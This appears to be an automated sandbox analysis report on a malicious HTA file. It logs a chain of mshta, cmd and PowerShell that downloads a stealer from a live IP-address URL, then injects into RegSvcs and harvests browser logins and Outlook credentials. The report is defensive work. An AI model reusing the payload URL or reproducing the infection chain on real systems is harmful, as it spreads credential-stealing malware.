                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00134E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00134E87
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00141E06 GetUserNameW,6_2_00141E06
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001049A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: cosse.exeBinary or memory string: WIN_81
                    Source: cosse.exeBinary or memory string: WIN_XP
                    Source: cosse.exeBinary or memory string: WIN_XPe
                    Source: cosse.exeBinary or memory string: WIN_VISTA
                    Source: cosse.exeBinary or memory string: WIN_7
                    Source: cosse.exeBinary or memory string: WIN_8
                    Source: cosse.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2094400694.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00176747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00176747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS138
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		11
                    Masquerading                    		LSA Secrets341
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials31
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636644 Sample: wecreatebestthingsentirelif... Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 checkip.dyndns.org 2->52 54 checkip.dyndns.com 2->54 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 78 14 other signatures 2->78 10 mshta.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 76 Tries to detect the country of the analysis system (by using the IP) 50->76 process4 dnsIp5 84 Suspicious command line found 10->84 86 PowerShell case anomaly found 10->86 16 cmd.exe 1 10->16         started        58 127.0.0.1 unknown unknown 13->58 signatures6 process7 signatures8 60 Detected Cobalt Strike Beacon 16->60 62 Suspicious powershell command line found 16->62 64 PowerShell case anomaly found 16->64 19 powershell.exe 45 16->19         started        24 conhost.exe 16->24         started        process9 dnsIp10 56 107.174.231.211, 49683, 80 AS-COLOCROSSINGUS United States 19->56 38 C:\Users\user\AppData\Roaming\cosse.exe, PE32 19->38 dropped 40 C:\Users\user\AppData\Local\...\cssos[1].exe, PE32 19->40 dropped 42 C:\Users\user\AppData\...\qrkmxxq1.cmdline, Unicode 19->42 dropped 80 Loading BitLocker PowerShell Module 19->80 82 Powershell drops PE file 19->82 26 cosse.exe 2 19->26         started        29 csc.exe 3 19->29         started        file11 signatures12 process13 file14 88 Antivirus detection for dropped file 26->88 90 Multi AV Scanner detection for dropped file 26->90 92 Binary is likely a compiled AutoIt script file 26->92 94 4 other signatures 26->94 32 RegSvcs.exe 15 2 26->32         started        44 C:\Users\user\AppData\Local\...\qrkmxxq1.dll, PE32 29->44 dropped 36 cvtres.exe 1 29->36         started        signatures15 process16 dnsIp17 46 checkip.dyndns.com 132.226.247.73, 49684, 80 UTMEMUS United States 32->46 48 reallyfreegeoip.org 104.21.64.1, 443, 49685 CLOUDFLARENETUS United States 32->48 66 Tries to steal Mail credentials (via file / registry access) 32->66 68 Tries to harvest and steal browser information (history, passwords, etc) 32->68 signatures18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    wecreatebestthingsentirelifeforgivenyou.hta37%VirustotalBrowse
                    wecreatebestthingsentirelifeforgivenyou.hta24%ReversingLabsScript-WScript.Trojan.Asthma

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exe100%AviraTR/AD.SnakeStealer.igtop
                    C:\Users\user\AppData\Roaming\cosse.exe100%AviraTR/AD.SnakeStealer.igtop
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exe42%ReversingLabsWin32.Trojan.AutoitInject
                    C:\Users\user\AppData\Roaming\cosse.exe42%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://107.174.231.211/311/cssos0%Avira URL Cloudsafe
                    http://107.174.231.211/311/cssos.exen0%Avira URL Cloudsafe
                    http://107.174.231.211/311/cssos.exev0%Avira URL Cloudsafe
                    http://107.174.231.211/311/cssos.exe100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.64.1
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://107.174.231.211/311/cssos.exetrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

